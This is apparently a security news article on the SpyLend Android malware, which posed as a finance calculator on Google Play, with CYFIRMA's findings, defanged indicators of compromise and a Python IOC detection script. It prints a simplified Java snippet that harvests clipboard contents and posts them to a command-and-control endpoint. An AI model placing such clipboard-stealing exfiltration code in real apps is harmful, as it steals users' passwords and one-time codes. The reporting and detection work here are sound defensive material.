A sophisticated Android malware campaign, identified as “SpyLend,” has successfully infiltrated the Google Play Store, cleverly disguising itself as a financial utility app aimed at Indian users. Operating under the name “Finance Simplified” (package: com.someca.count), the application has garnered over 100,000 downloads since its launch in February 2025, using its legitimate appearance to evade user suspicion.
Cybersecurity firm CYFIRMA has brought this operation to light, revealing a complex attack strategy designed to extract sensitive information, offer predatory loan services, and extort victims through blackmail tactics. Initially, the app presents itself as a benign finance calculator but adapts its interface based on the user’s geolocation.
For users in India, the app activates a WebView component that loads content from adv[.]rp5[.]org, a domain associated with unauthorized loan applications. These services, including KreditApple and MoneyApe, operate beyond the scrutiny of the Play Store, redirecting victims to external Amazon EC2 servers to download malicious APKs, such as KreditApple.apk (SHA-256 fa27aa603eb6807dbc60d5dadc5b8f9b9290099f).
Once installed, SpyLend requests invasive permissions, including access to call logs, SMS, contacts, and clipboard data, all under the pretense of identity verification. Users have reported harassment and blackmail, with threats involving manipulated photos and demands for payment. Negative reviews on the Play Store reflect concerns over data misuse, yet the app remains available as of February 24, 2025.
Technical Exploitation and Command Infrastructure
The operational framework of the malware hinges on its exploitation of Android’s WebView API coupled with a custom command-and-control (C2) server. By dynamically injecting JavaScript code, SpyLend retrieves loan application listings through specific endpoints such as app/product/app/list and app/loan/config.
These APIs provide loan parameters, including interest rates and repayment methods, while tracking user interactions via app/user/saveVisitor, which exfiltrates device metadata and behavioral analytics.
A notable evasion tactic involves hosting loan applications on Amazon EC2 instances, effectively circumventing Play Store vetting processes. The APKs utilize persistence mechanisms such as JobInfoSchedularService and AlarmManagerSchedularBroadcastReceiver, enabling background tasks that maintain access.
Additionally, the malware captures clipboard data every three seconds through ClipboardManager, allowing it to seize passwords, credit card information, and one-time passwords (OTPs):
```java
// Clipboard monitoring code snippet (simplified, as reported)
ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
ClipData clip = clipboard.getPrimaryClip();
String clipboardData = clip.getItemAt(0).getText().toString();
// Exfiltrates data to C2 via JSON
JSONObject exfilData = new JSONObject();
exfilData.put("clipboard", clipboardData);
HttpClient.post(C2_ENDPOINT, exfilData);
```
The C2 infrastructure, located at 16[.]163[.]9[.]142, employs endpoints such as /admin/file/upload to receive stolen SMS messages, call logs, and app lists. Analysis of the admin panels by CYFIRMA reveals the presence of Chinese-language scripts (zh.js), hinting at the origins of the threat actors involved.
Data exfiltration encompasses:
- GPS coordinates, updated every three seconds via LocationManager.
- Installed applications and their installation timestamps (using PackageManager).
- SMS content accessed through the content://sms/ URI.
Despite the protective measures offered by Google’s Play Protect, SpyLend’s reliance on WebView-delivered content enables real-time updates to its payload, effectively evading static analysis. CYFIRMA’s YARA rules, which detect specific hashes like 95a44305f9162352eddbb31e3ea03d7e, along with MITRE ATT&CK mappings, underscore the malware’s capabilities in defense evasion (T1628) and credential access (T1414).
Users are advised to carefully review app permissions, steer clear of third-party APKs, and remain vigilant for any suspicious activity. For enterprises, deploying endpoint detection tools and blacklisting indicators of compromise (IOCs) such as moneyape[.]org is recommended.
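As an added illustration of the IOC blacklisting step (not code from CYFIRMA or this article), the script below refangs the indicators quoted above, flags proxy or DNS log lines that contact the reported hosts or C2 API paths, and checks a package listing for the reported package name. The log lines are constructed samples, and the assumption that the endpoint paths appear verbatim in request URLs is mine.

```python
import re
from urllib.parse import urlparse

# Indicators quoted in the report above, kept in defanged form.
DEFANGED_IOCS = {
    "domains": ["adv[.]rp5[.]org", "moneyape[.]org"],
    "ips": ["16[.]163[.]9[.]142"],
    "packages": ["com.someca.count"],
}
# API paths the report attributes to the loan-config and C2 servers
# (assumed to appear as-is in request URLs).
C2_PATHS = ("app/product/app/list", "app/loan/config",
            "app/user/saveVisitor", "admin/file/upload")


def refang(ioc: str) -> str:
    """Turn 'adv[.]rp5[.]org' back into 'adv.rp5.org' for matching."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


HOSTS = sorted(refang(h) for h in DEFANGED_IOCS["domains"] + DEFANGED_IOCS["ips"])


def check_log_line(line: str) -> list[str]:
    """Return the reasons a proxy/DNS log line matches the IoCs (empty if none)."""
    hits: list[str] = []
    for url in re.findall(r"https?://\S+", line):
        path = urlparse(url).path
        if any(p in path for p in C2_PATHS):
            hits.append(f"c2-path {path}")
    for host in HOSTS:  # bare-host match also covers DNS query logs
        if re.search(rf"(?<![\w.-]){re.escape(host)}(?![\w-])", line):
            hits.append(f"host {host}")
    return hits


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> reasons for every line that matches."""
    return {i: h for i, line in enumerate(lines) if (h := check_log_line(line))}


def check_packages(installed: list[str]) -> list[str]:
    """Flag reported package names in `adb shell pm list packages` style output."""
    wanted = set(DEFANGED_IOCS["packages"])
    names = [p.removeprefix("package:") for p in installed]
    return [n for n in names if n in wanted]


SAMPLE_LOG = [  # constructed sample lines, not taken from the report
    "2025-02-24T10:01:02Z GET http://adv.rp5.org/app/loan/config 200",
    "2025-02-24T10:01:05Z POST http://16.163.9.142/admin/file/upload 200",
    "2025-02-24T10:01:09Z GET https://example.com/app/update 200",
    "2025-02-24T10:01:12Z DNS query moneyape.org A",
]
```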